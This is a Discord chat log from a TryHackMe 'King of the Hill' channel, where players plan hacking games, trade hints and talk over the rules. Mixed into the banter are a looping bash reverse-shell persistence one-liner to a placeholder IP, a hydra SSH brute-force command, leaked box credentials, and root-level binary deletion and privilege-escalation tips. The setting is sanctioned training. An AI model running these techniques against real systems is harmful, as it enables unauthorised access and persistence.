#koth

1 messages Β· Page 37 of 1

fair adder
#

this box hates me

#

i can't play 😭

visual spire
#

hi

#

any want to play

fair adder
#

this box hates me

weary marten
#

box is slow

visual spire
#

HI

weary marten
#

hey

visual spire
#

WANNA PLAY?

weary marten
#

already in a game

visual spire
#

ok

#

well

#

did it start

#

?

weary marten
#

yup

visual spire
#

ok enjoy it

fair adder
#

@exotic quiver its been 5 minutes of me ruinning linpeas...

exotic quiver
#

thats a yikes πŸ˜‚

fair adder
#

this is cursed so much

#

I've already got root

#

just not doing anything rn lol just chillin

#

its not working

#

my shell keeps dying on its own..

#

try a different port

#

that happened to me before

visual spire
fair adder
#

i alredy exited out of everything

#

hahaha

#

bruh

exotic quiver
#

----ia-------e-- /root/king.txt thonkeng

weary marten
#

πŸ‘€

exotic quiver
#

@weary marten that's an interesting binary you got there buddy

weary marten
#

ohh no lol

#

i m bad at hiding xD

exotic quiver
#

nah, not necessarily. was a good spot πŸ™‚

#

atleast i assume it was you

weary marten
#

xD

exotic quiver
#

reeeeeeee

#

oof, you've already won anyway 😦

fair adder
#

lol love the perms set on king.txt by you guys

nova tide
#

@nova tide wonna play ?
@fair adder sure

#

i'm a bit late though

zealous sun
#

gg

fair adder
#

Somebody create a new game

#

we got windows...

#

Everyone join this game instead

#

Join quick!

#

2.5 mins remaining

#

im still at work, but i join, i will try multitasking πŸ˜†

#

:DDD

#

some people watch reddit at work

#

you, however, do thm

#

true chad

#

Yeah, THM is more fun then reddit πŸ˜†

#

+1

#

specially the discord πŸ˜‰

nova tide
#

Good luck guys

rancid pewter
#

Hey I just joined the game can I have one reset plz ?

nova tide
#

nothing is patched though

#

ok imma reset

rancid pewter
#

Thanks

#

@nova tide I think you have made a fork bomb

nova tide
#

don't know

rancid pewter
#

Is the rootkit coming soon ?

nova tide
#

hopefully

#

but for now working on eJPT

nova tide
#

GG's

fair adder
#

i couldnt get the backdoor shell to work...

nova tide
#

you were playing this time @rancid pewter ?

fair adder
#

but was fun anyway

nova tide
#

after last reset

rancid pewter
#

@nova tide Yeah Wasnt able to get the any password

#

GG

nova tide
#

GG

rancid pewter
#

Want to do another game ?

fair adder
#

im in

rancid pewter
#

Good

nova tide
#

share invite link here

#

imma grab something to eat

rancid pewter
#

Want a specific box ?

nova tide
#

random is fine

rancid pewter
buoyant radish
#

if someone streaming theirs KOTH sessions send me a link i love to watch it to learn me different techniques

fair adder
#

oh, first time playing this room, be nice guys πŸ˜„

rancid pewter
#

Sorry already king

nova tide
#

also kig 🀣

rancid pewter
#

Yeah no tab completition

#

No rootkit on the box

#

Who is trying to use chattr ?

nova tide
#

who ran fake chattr πŸ€¦β€β™‚οΈ in while loop

rancid pewter
#

Removed

stiff egret
#

oops

rancid pewter
#

You all got your backdoor and persistence set ?

#

Who deleted a bunch of binaries ?

fair adder
#

not me.. but i felt for it^^

nova tide
#

reset???

stiff egret
#

someone borked sudoers. nice

rancid pewter
#

You were lucky I there was a typo in my backdoor

stiff egret
#

πŸ˜†

nova tide
#

who is resetting tho?

fair adder
#

the ones who are locked out ^^

zealous sun
#

no chmod 5:

fair adder
#

sudoers is gone

zealous sun
#

perl -e 'chmod 0755, "file"'

rancid pewter
#

@nova tide Are you the one moving all the binary ?

fair adder
#

at least i dont know any other way to privsec

zealous sun
#

I was just to late

nova tide
#

i'm not playing anymore

#

it takes time to build up stuff and everyone just resets

#

@nova tide Are you the one moving all the binary ?
@rancid pewter not all. just 2,3 that you need

stiff egret
#

it takes time to build up stuff and everyone just resets
@nova tide +1

rancid pewter
#

Yeah that true sorry for reseting

nova tide
#

nvrmnd

stiff egret
#

Also, your typo is still there. (I am lucky I guess)

nova tide
#

kig?

rancid pewter
#

The little type just pissed me off since after all the binary were moved chmod, wget

stiff egret
#

no, myDonut borked sudoers (again)

rancid pewter
#

I am not even on the box

nova tide
#

The little type just pissed me off since after all the binary were moved chmod, wget
@rancid pewter i can send you what i moved them too

stiff egret
#

well then its someone with a machinegun and dont know how to use it.

nova tide
#

wget,curl,chmod just moved those three

#

(unless you tried systemctl as well)

rancid pewter
#

Yeah also

#

Dont worry fixed the typo this time

nova tide
#

GL

rancid pewter
#

Let do a last reset at like 30 mins or so

nova tide
#

btw nice DP though

#

took you so long to change πŸ˜„

#

i was just used too long at that blue one

stiff egret
#

πŸ˜‚

rancid pewter
#

Yeah thanks

#

Someone put a reverse shell in ps

fair adder
#

what happend with king.txt ? πŸ˜‰

stiff egret
#

🀨

fair adder
#

i cant write to it^^

zinc furnace
#

anyone want to join random machine?

nova tide
#

@zinc furnace that's a spectator link

#

click on Options from top right corner and copy paste invite link

zinc furnace
#

ohh sorry for that

#

my bad

rancid pewter
#

GG all

fair adder
#

GG

#

is there any chance to unlock the file, once its locked ?

rancid pewter
#

Yeah with chattr

fair adder
#

chattr

#

i cant, get kicked out once i use it.

rancid pewter
#

You need to download it from your box

fair adder
#

ohh

#

and or upload it into the box you intent to use it on

#

i see πŸ˜‰ thx for the tipp

#

im playing on MacOS ^^so yeah, kinda tricky sometimes

rancid pewter
#

As your main OS ?

fair adder
#

yes

zealous sun
#

...

fair adder
#

also doing all ctf's on MacOS.. but i'll have to switch to kali VM or something.

nova tide
#

i cant, get kicked out once i use it.
@fair adder the one you were using was pre installed binary named as chattr that would kill your shell..

fair adder
#

yeah, thats why i have to install kali, to upload my chattr bin, (no chattr on my mac)

#

thanks for the games guys, was fun (and thx for the tipps) see you next timeπŸ‘

#

i use my mac to do koths too

#

lmaoo

rancid pewter
#

@fair adder Using chattr from kali won’t work since it linked with library which may not be on every box so you need a statically compiled. You can compile it yourself or download it from the internet

fair adder
#

thx i found it πŸ™‚

nova tide
#

or write a python code to change file attributes

#

or go for RootKits

rancid pewter
#

or write a C script with 50 thread in 5 different process to brute force it

nova tide
#

i tried but that won't over do rootkit kekw

fair adder
#

yeah, im still new in ctf's so i appreciate every tipps from you guys.

nova tide
#

the only thing i have done so far is installing ubuntu and kernel

rancid pewter
#

I am really curious to see how your rootkit will work

#

Ohhh

nova tide
#

just completed the semester

#

finals ended two days ago

fair adder
#

congrats tipsfedora

rancid pewter
#

Nice

nova tide
#

even Screamy competition was during my finals

#

well that one i just won coz i was lucky i guess

#

in first 15 minutes we thought your rootkit is in action kekw

#

so my team gave up xD

rancid pewter
#

I haven’t done anything in the finals the 15 mins were by my teammate

nova tide
#

even though i found all of the bianries in /var/dev/X11/<all the binaries hidden by your team>

#

but still my team left VC

#

yeah i heard about that

rancid pewter
#

I was just focusing too much with my rootkit that was not working

nova tide
#

you done with that yet?

rancid pewter
#

Yeah took me 30 sec too fix

nova tide
#

imma ping you a few times when i start working on mine if that's ok?

#

noice

rancid pewter
#

Yeah no problem

#

You will be there for the competition on Sunday ?

nova tide
#

i don't know yet

#

coz Eid on saturday

#

for three days

#

will be busy alot

rancid pewter
#

I need my revenge

nova tide
#

i will try to join in.. but mostly on Eid will be busy with alooot of guests that gonna ruin the internet with 1080p youtube videos,downloads/uploads. and serving them food and all the stuff of Eid.

rancid pewter
#

Join if you want and if you feel like it but soon enough I will get my revenge

nova tide
#

Join if you want and if you feel like it but soon enough I will get my revenge
@rancid pewter looking forward to that..

#

i still wanna do a proper match against your rootkit some day.. when i am done with working on mine i will ping you.. then we can set a time to play

rancid pewter
#

Whenever you want I am always ready

nova tide
#

πŸ‘

fair adder
#

lol myDonut is ready to win the 50 USD lmaoo

nova tide
#

well i'm not in the competition for the prize i just wanted to play with good players.. the screamy competition was aloot of fun...

fair adder
#

yea i feel u

nova tide
#

in competition we can atleast follow some rules and there aren't noobs like who spam reset button after you change password for one user

fair adder
#

i had someone from third round dm me complaining that why he's not on the final and i was like simply because you didn't pass

nova tide
#

lmao

zealous sun
#

Naughty how do you get your name in king.txt I just can't find it

nova tide
#

i ran it in a loop

zealous sun
#

I know cant find the loop lol

#

I did get you out of the ystem right?

nova tide
#

i wasn't playing. was just updating my SixSiege

#

1.2 gb update

#

but came back when i saw you are 3 minutes king πŸ˜„

#

had to pause the update

#

after loop i just continued the update

#

i also don't play food. its not fun as there is already a writeup for it.

zealous sun
#

Whats the fun in using a writeup

nova tide
#

i said it exists.. so its not fun as everyone can use the writeup

zinc furnace
#

@nova tide and @zealous sun any hints??

nova tide
#

i'm just doing the new room atm

#

i think he patched most of the ways

zinc furnace
#

any hint what was the flaws?

#

@zealous sun any hints??

zealous sun
#

Hints for what?

zinc furnace
#

what was vulnerable?

zealous sun
#

I got in with mysql

#

so itSo the port and connected

#

tried some users

#

one got a hit without password

zinc furnace
#

okay

zealous sun
#

I amd done with koth fro now played 5 in a row

#

or 4

livid dagger
#

who is attacking the production koth so hard that it is not working at all?

#

I can't even ssh into the machine!

patent forge
#

is making a script which kills all incoming pts allowed in koth?

short tusk
#

PTS?

#

OH PTS

#

Sorry slow today

patent forge
#

i was wondering what was wrong lol

short tusk
#

I'm looking for the Documents for KOTH, can't seem to find any. There are specific rules and as a non-KOTH player I can't relay them all. Give me a few minutes.

livid dagger
#

Yes, this was discussed several times here with Ninja I think? but I don't know if rules changed

short tusk
#

Ah they're on the KOTH page

livid dagger
#

I don't think they did and if so, I need to double check

#

^^^^

short tusk
#
To prevent cheating and ensure this game is realistic, everyone must the follow the rules:

The machine should not be made unavailable (shutdown, firewall rules to stop all communication, all services terminated, machine botching etc..)
Only stop a service if it can't be patched any other way. Services should remain available for "genuine users of the box" if at all possible.
No modifying/removing flags
Do not attack, modify or stop the service on 9999
Any sort of DoS against the machine
No attacking other users
Scripts that automatically hack and/or harden the machine are forbidden
Games are moderated, and failure to abide by the rules will result in a game and/or site ban.
patent forge
#

so if i can login via id_rsa but my shell keeps closing can be considered as "cheating"?

gusty cradle
#

No

patent forge
#

trying to understand / learn

short tusk
#

If your shell keeps closing because someone else is closing it, that is not allowed.

brazen cloud
#

Hi friends

#

we consider any type of scripting as "autopwning"

#

Am working with the other staff to get that double-checked and formally written up now that our new help site (former to the docs) is beginning to launch

patent forge
#

@brazen cloud can I dm you?

gusty cradle
#

πŸ‘€

brazen cloud
#

regarding please? I'm a tad busy so will reply as and when (l @patent forge

patent forge
#

infos about this topic, of course i don't care about the koth itself, but i just wanna know what I'm allowed to do

#

becase of course we can all make a script which kills all pts and basically make the machine unaccessible

#

like what i'm wasting my time on for the past 40 minutes

zinc furnace
#

random machine

#

anyone want to join???

oak jacinth
#

I will join in a min

#

If you set another game it in 10 mina

stiff egret
#

@zinc furnace is the game running?

visual spire
#

who wants to play

visual spire
hazy zodiac
visual spire
#

hello

#

every body

nova tide
#

hellp @visual spire

visual spire
#

how are u doing

nova tide
#

i am doing great wbu?

visual spire
#

im good

#

what machine will we play

#

_

nova tide
#

its just a random one. sooo no idea

visual spire
#

ok

#

they always bringup the window machine

#

s

nova tide
#

there is only one windows machine and that's offline that i hate

visual spire
#

exactly

#

i hate too

#

it

#

its shrek

visual spire
#

GG

#

hi man

zinc furnace
#

Hi @nova tide

#

congo for king

nova tide
#

Hi @nova tide
@zinc furnace hye

#

@visual spire hello

visual spire
#

hi

nova tide
#

hi
@visual spire what you wanted to ask in DM's?

#

also

#

!rule 1

pearl gladeBOT
#

Rule 1: No unsolicited direct messages (DMs) to other members of the discord. This includes staff. Verify that the member you are messaging is ok with you sending them DMs. The only exception to this rule is if a situation warrants the involvement of a moderator in order to handle something such as harassment or a situation where another member of the discord has made you feel uncomfortable.

visual spire
#

ok

#

im sorry

#

i just wanted to ask u

#

if you could teach me how u got into the machine

#

when we played together on shrek machine

#

GG

zinc furnace
#

starting in next 3 mins anyon want to join

#

random machine

visual spire
zinc furnace
#

@visual spire are you free now?

visual spire
#

yes

#

im

#

@zinc furnace

#

wanna play_

#

?

zinc furnace
#

just finishing one game in few mins

visual spire
#

ok

#

when you done

#

text me here

rancid pewter
visual spire
#

join the voice chat @rancid pewter

rancid pewter
#

My speaking english is really bad

visual spire
#

ok

#

got it

zinc furnace
#

i am free now

rancid pewter
#

Oh hell no Offline

visual spire
#

bro can you change the machine

#

i just saw and i was shuked

rancid pewter
#

Let do 10 mins than I start another one

visual spire
#

na na i will start another one now

rancid pewter
#

Ok ok

#

@visual spire Want a specific box ?

visual spire
#

no but linux

rancid pewter
visual spire
#

ok

weak haven
#

probably should have started my vm before clicking the link

rancid pewter
#

GG all

coral sage
#

are there rules about when you are allowed to reset the box?

zinc furnace
#

if anybody is created a room then send me the joining link

terse willow
#

are there rules about when you are allowed to reset the box?
@coral sage It should only be done if a rule has been broken, or someone accidentally destroyed the box

#

Not being able to get in (if the machine has been successfully patched, and no rules broken) is not a good reason

nova tide
#

Not being able to get in (if the machine has been successfully patched, and no rules broken) is not a good reason
@terse willow is there any possibility this being added in koth rules smh? Also it had 15 upvotes in #641405480547385354 .

#

Idk if i said it before or not but good luck with oscp

stiff egret
#

Yeah, tbh, KoTH rules need to be refined.

terse willow
#

@lusty portal any chance of that getting added to the KoTH rules next update? Kinda unspoken already, but might as well set it in stone

lusty portal
#

Ah yes, let me do that now (locally)

full grove
#

push 2 prod! push 2 prod!

#

do it!

nova tide
#

Finally😍

#

and here i was planning to leave KoTH πŸ˜‚
Hopefully it will be more fun after rules.
Also koth teams gonna be a lit update β™₯️

safe saddle
#

guys koth is really fun but unfortunately the machines pool is limited and if someone see a machine for the second time it's much more easy for him/her...
is there any way to solve this problem??
i already feel in love with this kind of a&d challenges and i need more πŸ™‚

quiet schooner
#

Make more KoTH boxes

brazen cloud
#

Has there been a new room / pool set released yet?

quiet schooner
#

Not for a while

terse willow
#

There are a few in testing

arctic beacon
#

hi

#

i have a problem with a koth machine (carnage)

quiet schooner
#

??

hazy zodiac
#

@arctic beacon the machine's problem or what

#

or u need help about it

quiet schooner
#

chattr is the command in the GNU operating system (with Linux kernel) that allows a user to set certain attributes of a file. lsattr is the command that displays the attributes of a file.
Most BSD-like systems, including macOS, have always had an analogous chflags command to s...

oak jacinth
#

Doesn't that command only work on certain machines

gusty cradle
#

Should work on all *nix machines that have the e2fsprogs package installed.

grand ember
#

the binary itself should work on all filesystems that support these file attributes

#

if the package is installed the binary would be installed but it isn't necessary for using the functions

gusty cradle
#

πŸ‘€

grand ember
#

iirc it does, it's still ext so

#

the binary might've been replaced tho

#

;)

arctic beacon
#

what should I do if I can't use chattr on the machine? I did some research and I didn't get nothing

grand ember
#

can't use chattr meaning the binary isn't there?

arctic beacon
#

can I pm you?

grand ember
#

ye

arctic beacon
#

ty

nova tide
#

public game starting in 3 minutes

fair adder
stiff egret
#

Started?

nova tide
#

Click and find out

visual spire
#

hello

#

are u playing??

stiff egret
#

Make a room, I'll join. maybe

deep jolt
#

Anyone up for KOTH?

sturdy plank
#

@nova tide can i dm u for a thing??

nova tide
#

sure

sturdy plank
#

ok

somber pelican
#

any new KOTH starting ?

#

i would like to join..

deep jolt
#

Well played @sturdy plank πŸ˜„

vivid ridge
#

Can anyone explain me how koth works?

deep jolt
#

Well its an hour long game where you compete with other players to gain highest points. You are given a machine to hack within an hour. Points are accumulated by finding flags placed within the machine and by being "king" (you must have your username in /root.king.txt file). Once you gain root access you can use different methods to prevent your competitors from gaining access to the machine.

vivid ridge
#

Thanks

deep jolt
#

/root/king.txt *

#

No problem. good luck πŸ™‚

quiet schooner
#

Also make sure you've read and understood the rules

sturdy plank
#

Well played @sturdy plank πŸ˜„
@deep jolt thx

gusty rapids
#

hello guys ? in KOTH are we authorized to reduce permission of the flag once we are root ?

terse willow
#

I don't see a problem with that, as long as you don't delete them. If you make it so that only root can read them then that should be fine, as other people can still get root

gusty rapids
#

yeah cool thanks ,dude !

fair adder
#

What's happend when you win a KoH?

quiet schooner
#

Not much

zinc furnace
safe saddle
#

holmes

#

:))

#

are you here buddy

stiff egret
#

Hey

safe saddle
#

what's up buddy πŸ™‚

#

how did you send message through the urandom?

#

:/

stiff egret
#

Nope, I was not the one sending umissiles.

#

OH that

#

lmao

safe saddle
#

ok :))))))))

#

so you don't have tty

#

right?

stiff egret
#

how did you send message through the urandom?
@safe saddle multiple shells

safe saddle
#

how?

@safe saddle multiple shells
@stiff egret

stiff egret
#

I don't think you have a backdoor,

safe saddle
#

nope

stiff egret
#

Yeah. I figured, If I kick you now, you'll be out

#

nvm no fun in that

safe saddle
#

yes :))))

#

i didn't created any...

#

i've played this box already...
i just want some fun

#

and learn some way to stay sneaky..

#

and learn some tricks.

stiff egret
#

yeah well rev shells don't come with a tty.

safe saddle
#

ok...
so what else?
what methods do you use to create backdoors?
other than creating a webshell in web root dir?
what other methods ?

stiff egret
#

what methods do you use to create backdoors?
@safe saddle google?

safe saddle
#

ok :)))
i know...
we are just chatting...

stiff egret
#

some loops to keep sending me rev shells. maybe

safe saddle
#

that's nice...
using crons...

visual spire
#

did any body hacked into the panda machine

#

??

stiff egret
#

Yes.

visual spire
#

what do i do after i get in the shifu user

#

any advice

stiff egret
#

Basic enumeration. Linpeas is enough.

#

||SUID Binaries||

visual spire
#

thank you

stiff egret
#

πŸ™‚

west sky
#

hi, im new here. In Koth do you need openvpn?

stiff egret
#

yes

west sky
#

does it connect automatically when i run openvpn /filename.ovpn/

stiff egret
#

Yep.

west sky
#

ok, also in koth the web server crashes alot, i lose connection. How could i fix that?

#

not only in koth, also in rooms

quiet schooner
west sky
#

ok, thx

visual spire
#

@stiff egret it didnt work

stiff egret
#

um What?

visual spire
#

the linpeas

#

for the panda

#

machine

stiff egret
#

What do you mean, "didnt work"? You ran the script?

visual spire
#

yes

#

when i write ./file.sh

#

after i wget it from the python server

stiff egret
#

Well, then read the script's output. You will see there are binaries that are exploitable.

safe saddle
#

@visual spire for priv esc after logging in as shifu you can exploit sudo permissions

#
shifu$sudo -l
visual spire
#

@safe saddle thanks man

deep jolt
#

THM down?

safe saddle
#

yeap :/@deep jolt

deep jolt
#

I think its back on now

glossy fiber
#

is anyone playing KOTH

zinc furnace
#

windows machine sucks seriously!!!

blissful kettle
#

Ah crap I accidentally joined by accident

autumn iron
#

hey b14ckdz

#

great game

#

but while doing cat on king.txt i see my name still you are the king πŸ‘€

quiet schooner
#

it doesn't change immediately, it's updated every minute

autumn iron
#

yeah i was on the file for 15 mins but still

stiff egret
#

Anyone playing KoTH?

autumn iron
#

me

stiff egret
#

send. the. link.

autumn iron
#

private??

stiff egret
#

your choice, I just wanna play, I am feeling sleepy and this will wake me up.

autumn iron
#

4mins

#

random

stiff egret
#

noice

#

just !windows

autumn iron
#

xD

zinc furnace
stiff egret
#

ugh, @zinc furnace join in, we are already in it

autumn iron
#

yeah join in

zinc furnace
#

send me the link??

autumn iron
#

@zinc furnace

#

1min left @zinc furnace

zinc furnace
#

joined!!!!!

nova tide
#

Im late

#

Anyone playing?

autumn iron
#

@stiff egret was that u πŸ‘€

stiff egret
#

yee

#

πŸ˜†

#

sitting in the shell

autumn iron
#

here comes mr. @stiff egret

stiff egret
#

lmao

autumn iron
#

wild entry

stiff egret
#

True, was in a conversation, also, you didn't patch a direct route to root.

autumn iron
#

no ididnt patch any thing

#

just waiting but that took me off 😒

#

blunder

stiff egret
#

oo, tho I did deluser shark

#

lmao

autumn iron
#

yeah cri

stiff egret
#

I haven't patched any entrypoints

#

except one

#

glor...

autumn iron
#

but root looks patched πŸ‘€

stiff egret
#

🀨

#

Nope

zinc furnace
#

anybody exploited shellshock??

#

@stiff egret @autumn iron what all the things you exploite???

stiff egret
#

um, shellshock? which user are you trying to get in from?

autumn iron
#

what all the things you exploite???
@zinc furnace i didnt get you..

zinc furnace
#

there are three users

#

alex

#

marty

#

and last one glaria

autumn iron
#

πŸ‘€ ig u cant post this

zinc furnace
#

@autumn iron how you got shell?

autumn iron
#

after the game please πŸ˜…

stiff egret
#

I haven't used any chattr, the file is mutable.

zinc furnace
#

@stiff egret @autumn iron any hints bro???

stiff egret
#

um, πŸ€” there's an public cve and a writeup for this box. (self promotion)

autumn iron
#

i was giving the same

#

xD

#

@zinc furnace check you dm

zinc furnace
#

all the things you pathed man

#

was trying the same only

stiff egret
#

@zinc furnace check you dm
@autumn iron secret instaroots?

#

xD JK

autumn iron
#

your git hub πŸ˜…

stiff egret
#

all the things you pathed man
@zinc furnace I patched glor....

#

Nothin else

zinc furnace
#

i found only directory traversal

#

and searching for the same

#

but you already patched it

stiff egret
#

I don't think so.

zinc furnace
#

okay lets start the new one

autumn iron
#

not me got some work you guys continue

zinc furnace
#

okay no issues

visual spire
west sky
#

Hello, I found a flag in kOTH, but when i submit it says flag incorrect

full grove
#

is it possible that someone modified the flag?

visual spire
#

its encrepted

west sky
#

ohhhh

visual spire
#

you have to decode

#

it

west sky
#

is it always a different hash type>

#

?

visual spire
#

right

west sky
#

yeah how did you know?

visual spire
#

im playing with you

west sky
#

LMAO

visual spire
#

im UM240

west sky
#

damn you good

visual spire
#

thanks

#

it took practice

west sky
#

how much time?

visual spire
#

go to cyberchef

#

and use from hex and from base64

west sky
#

ok, gimme a sec

visual spire
#

ok

west sky
#

cyber chef is like a decoder??

visual spire
#

yes

west sky
#

from hex

#

i put from hex

visual spire
#

and from base64

#

toghether

#

together

west sky
#

ok i see

#

i had to drag

#

i click bake

visual spire
#

just drag them

#

it should show you

west sky
#

Oh I got it Thanks man!!!

visual spire
#

come to khot voice chat

#

so i can show you

#

koth

west sky
#

is it always from hex and from base64??

visual spire
#

only the flag

west sky
#

always the same encoding, right?

visual spire
#

yes

west sky
#

cool, cool

#

u put your name in the file>

#

?

visual spire
#

you mean the king.txt

#

??

west sky
#

yeah is it always the same name

visual spire
#

yes

#

are you root

west sky
#

whats that

visual spire
#

its loop

#

you can't chang it

west sky
#

no i dont have king.txr

#

txt

visual spire
#

where you at now

west sky
#

nowhere, i am trying to find directories with dirb

#

i found a lot of directories in the wordpress but they all lead to nowhere

visual spire
#

ok

west sky
#

i found a js direcory

visual spire
#

ssh shifu@10.10.190.0

#

use them

#

i will change the pass

#

in min

west sky
#

i got it

#

how were u able to find the username and pass??

visual spire
#

hydra

west sky
#

ohhh what was the original password?

visual spire
#

batman

west sky
#

what was the link of the login for the admin? i cant find it

#

because hydra needs to get the url for the login

visual spire
#

what do you mean

#

?

#

did you see a message on your erminal

west sky
#

for the brute force, you need to have the url it is going to brute force right?

#

yeah

visual spire
#

you dont

#

you can use sudo -l

#

to see how you can get root

west sky
#

can i see your hydra command?

visual spire
#

hydra -l shifu -P /usr/share/wordlists/dirbuster/directory-file-2.3-mediem.txt ssh://ip -t 4

west sky
#

ok i see

visual spire
#

are you ready??

west sky
#

also, i did cat flag.txt and i got a flag but i put it in the from hex from base64 and it doesnt give anything

visual spire
#

no

#

you don't need

west sky
#

oh, lol its not encoded

visual spire
#

just take and submit it

#

open your terminel and whatch

west sky
#

ok i also have another question, in your command hydra -l shifu -P /usr/share/wordlists/dirbuster/directory-file-2.3-mediem.txt ssh://ip -t 4 all i need to do to reuse this is change the ip right?

#

lol

visual spire
#

the ip

#

and check if the spelling of the dir right

west sky
#

oh, was that two different commands??

visual spire
#

wait

#

its medium

#

i told the spelling was wrong

#

in the end

west sky
#

oh yeah, how do you stop the spam??

visual spire
#

and instad of file write list

west sky
#

hmm ok i see

#

can i ask you what tools you use for pentesting? I use dirb

visual spire
#

i use gobuster

west sky
#

thats it?

visual spire
#

what is it

#

!

west sky
#

u dont use anything else?

#

oh, its basically the same thing as dirb

visual spire
#

yes

#

in this machine. no

west sky
#

oh, cool, so what do you do once you get into the machine?

visual spire
#

the panda one?

west sky
#

yeah

visual spire
#

i go root

#

sudo su root

#

and if it doesnt work

#

use sudo -l

#

and it will show what can the user run as rot

west sky
#

wow

fair adder
#

hey

west sky
#

so you found the king.txt file there, right??

fair adder
#

Would you mind having this conversation in DMs

visual spire
#

u can use it to get to the root

fair adder
#

you're spoiling the box 😁

visual spire
#

@fair adder wooooow

west sky
#

he killed the vibe

#

jk, lol

visual spire
#

hhhh

#

lol

#

in this machine you can use

west sky
#

thats really cool, but i cant stop your script from spamming?

fair adder
#

bruh

visual spire
#

i know

fair adder
#

DMs please

visual spire
#

ok

#

chill

#

we are leaving

west sky
#

ubay u know panda machine commands??

visual spire
#

go dm

west sky
#

ayt

zinc furnace
#

space jam is too easy man!!!!!!!

brazen cloud
#

The machine pool is created for literally every skill range

#

Space jam was the first (beta) and it's comparatively easy to ones like Offline so

#

all perspectives (:

glossy fiber
fair adder
#

Space jam was the first (beta) and it's comparatively easy to ones like Offline so
@brazen cloud offline is easier

glossy fiber
#

goldshay how many persistance you have in your recent game

#

production

fair adder
#

Lol

#

not a lot

glossy fiber
#

can teach us how to create persistence

fair adder
#

I usually have 3 but this game I had 2

#

sorry I can't, not the right guy for this

zealous sun
#

nohup bash -c "while true; do bash -i >& /dev/tcp/<IP>/<PORT> 0>&1 || sleep 5; done 2>&1 >/dev/null" >/dev/null

#

I just run this

grand ember
#

not all linux machines have the /dev/tcp device enabled so it might not work on all boxes :)

zealous sun
#

If you are in bash it works

grand ember
#

πŸ‘

zealous sun
#

Might need to type it again to much /Dev/null

grand ember
#

lol

stiff egret
#

@zealous sun killall bash will blow that up.

zealous sun
#

I know

#

What do you suggest new user?

gusty cradle
#

Use zsh

zealous sun
#

Why not fish?

stable glen
#

i am new to this can anyone help me?

#

from like the very start like ion even know ever to start 😒

hidden bridge
stable glen
#

oh shit

#

i was in ur game @hidden bridge then i left cuz ion what to do

#

lmfao

hidden bridge
#

I know what to do but I can't even ping the box

stable glen
#

try -f ping

hidden bridge
#

yeah nothing

stable glen
#

hm

stiff egret
#

Which box are you doing?

#

@stable glen

hidden bridge
stiff egret
#

this?

stable glen
#

yes

hidden bridge
#

yes

#

says on the /access I'm connected

stiff egret
#

You may need to reset, I can't ping it either.

hidden bridge
#

okay

#

thanks

stable glen
#

there

nova tide
rancid pewter
#

Hey @nova tide is the rootkit coming ?

nova tide
#

Hey @nova tide is the rootkit coming ?
@rancid pewter its still Eid, still guests are coming.. just came back from Swimming Pool went with guests.. finally got some time to even turn on pc

zinc furnace
#

@nova tide please do not patch anything in this game

nova tide
#

@nova tide please do not patch anything in this game
@zinc furnace sure

stiff egret
#

invite link

zinc furnace
#

thanks buddy......

stiff egret
#

sudo invite link

zinc furnace
nova tide
#

sudo invite link
@stiff egret User is not in sudoers, Incident will be reported

stiff egret
#

no patching rule?

#

@stiff egret User is not in sudoers, Incident will be reported
@nova tide you have a mail

zinc furnace
#

yefs

#

yes

#

no patching buddy

stiff egret
#

alright no probs. I need to test a few things anyway. Tho I can attack king file right?

rancid pewter
#

@nova tide Wanna DM ?

nova tide
#

sure???

visual spire
#

hi

nova tide
#

hi

visual spire
#

are you playing

nova tide
#

no

visual spire
#

wanna_

#

_

zinc furnace
#

@visual spire you patched man???

visual spire
#

yes

zinc furnace
#

hahhhaahha

visual spire
#

what

#

@zinc furnace

zinc furnace
#

i also patched man

visual spire
#

ok

zinc furnace
#

@visual spire how yo are esclating priveleges??

visual spire
#

aaaaaaa

#

πŸ˜†

zinc furnace
#

/bin/sh -c /usr/bin/find / -name "chattr" -exec rm -rf {} ;

#

@visual spire you ran this???

quiet schooner
#

You know you can copy your own binary over right?

#

And call it whatever you want

visual spire
#

naa

zinc furnace
#

it was running with root

visual spire
#

and rlwrap nc -lvnp 443

#

at the same time

zinc furnace
#

one tmux session was also running with root

visual spire
#

and when you ssh to it

#

with the id-rsa key

#

it shows that you need a key word

#

it was dance

zinc furnace
#

yes i know

#

but i did not sshed

visual spire
#

yes

#

but you have to ssh it to the port 1337

zinc furnace
#

i just exploted port nostromo

#

and got a shell

visual spire
#

ok

#

so you were in

#

??

zinc furnace
#

yes man

visual spire
#

why didn't you put your name in the king

#

file

#

you saw this is UM240 messages right??

zinc furnace
#

i was not able to esclate priveleges

visual spire
#

okkkkkk

#

at this point there was a private key in side /home/gloria/.ssh

zinc furnace
#

i deleted that

visual spire
#

you can ssh with that key

zinc furnace
#

all the files under .ssh

#

i deleted that

visual spire
#

well

#

that is why

zinc furnace
#

so that no one can use

visual spire
#

you couldnt root

zinc furnace
#

yes i was struggling to be root

visual spire
#

did you use it before you deleted it

#

?

zinc furnace
#

no i have not used it

visual spire
#

okkk

#

well

#

you'll have used it

#

to ssh

zinc furnace
#

there was one service that i exploited to login to the box

#

and after that deleted the keys

visual spire
#

what machine

zinc furnace
#

random

visual spire
#

@zinc furnace

zinc furnace
#

first time seeing this one

visual spire
#

me too

zinc furnace
#

@visual spire you exploited ping??

visual spire
#

it doesn't work

zinc furnace
#

any hint fort this box

#

??

visual spire
#

mysql

#

@zinc furnace

zinc furnace
#

user??????

#

mysql user???

visual spire
#

@zinc furnace

zinc furnace
#

how did you find it??

#

hit and trial???

visual spire
#

nmap

#

did you get in

#

@zinc furnace

zinc furnace
#

not yet

visual spire
#

ok

zinc furnace
#

how many flags you found on mysql db?

visual spire
#

one

zinc furnace
#

and after that?

visual spire
#

found a user and a pass in the db

#

ssh to it

#

did some esc to the root

#

priv esc

zinc furnace
#

database name???

visual spire
#

use users

#

select * from users

zinc furnace
#

ramen??????

#

ooohhhh

#

i just focused on flag

visual spire
#

hhhh

zinc furnace
#

user i missed

#

my bad

#

and what nmap you ran????

visual spire
#

nmap -sC -sS -sV -p- -oN nmap ip

zinc furnace
#

got it man

visual spire
#

ok

zinc furnace
#

how can i miss the user😫

visual spire
#

don't let the flag do to you like that

zinc furnace
#

only focusing on flag

zinc furnace
#

please delete your last screenshot

visual spire
#

why

zinc furnace
#

rules buddy

visual spire
#

aaaaa

#

ok

zinc furnace
#

can you give me your whatsapp???

visual spire
#

no bro

#

add me in here

zinc furnace
#

any social media account??

visual spire
#

you message me on discord

#

man

quiet schooner
#

@visual spire 2nd time now. Please keep spoilers for machines in DMs.

visual spire
#

im so sorry

#

you wont see me again

#

@quiet schooner

quiet schooner
#

Just don't spoil the machines here please

visual spire
#

ok

#

you got this one

#

man

terse topaz
#

